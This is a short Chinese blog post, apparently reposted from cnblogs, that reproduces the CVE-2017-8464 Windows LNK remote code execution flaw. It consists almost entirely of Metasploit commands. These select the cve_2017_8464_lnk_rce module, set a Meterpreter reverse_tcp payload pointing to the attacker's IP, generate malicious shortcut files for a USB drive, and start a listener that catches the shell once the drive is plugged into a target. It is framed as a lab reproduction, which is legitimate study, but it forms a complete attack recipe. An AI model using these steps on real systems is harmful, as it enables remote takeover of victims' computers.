CVE-2017-8464(震网三代)复现

开启msf

root@sch01ar:~# msfconsole

 设置模块

msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce

 设置payload

msf exploit(cve_2017_8464_lnk_rce) > set payload windows/x64/meterpreter/reverse_tcp

 show options

CVE-2017-8464(震网三代)复现_第1张图片

设置监听的ip

msf exploit(cve_2017_8464_lnk_rce) > set lhost 192.168.220.131

 生成文件

msf exploit(cve_2017_8464_lnk_rce) > exploit

 CVE-2017-8464(震网三代)复现_第2张图片

打开文件的文件夹

root@sch01ar:~# xdg-open /root/.msf4/local

 CVE-2017-8464(震网三代)复现_第3张图片

把这些复制到U盘里,开启监听

msf exploit(cve_2017_8464_lnk_rce) > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.220.131
msf exploit(handler) > exploit

 把U盘插到目标主机

CVE-2017-8464(震网三代)复现_第4张图片

CVE-2017-8464(震网三代)复现_第5张图片

 

转载于:https://www.cnblogs.com/sch01ar/p/7787682.html

你可能感兴趣的:(CVE-2017-8464(震网三代)复现)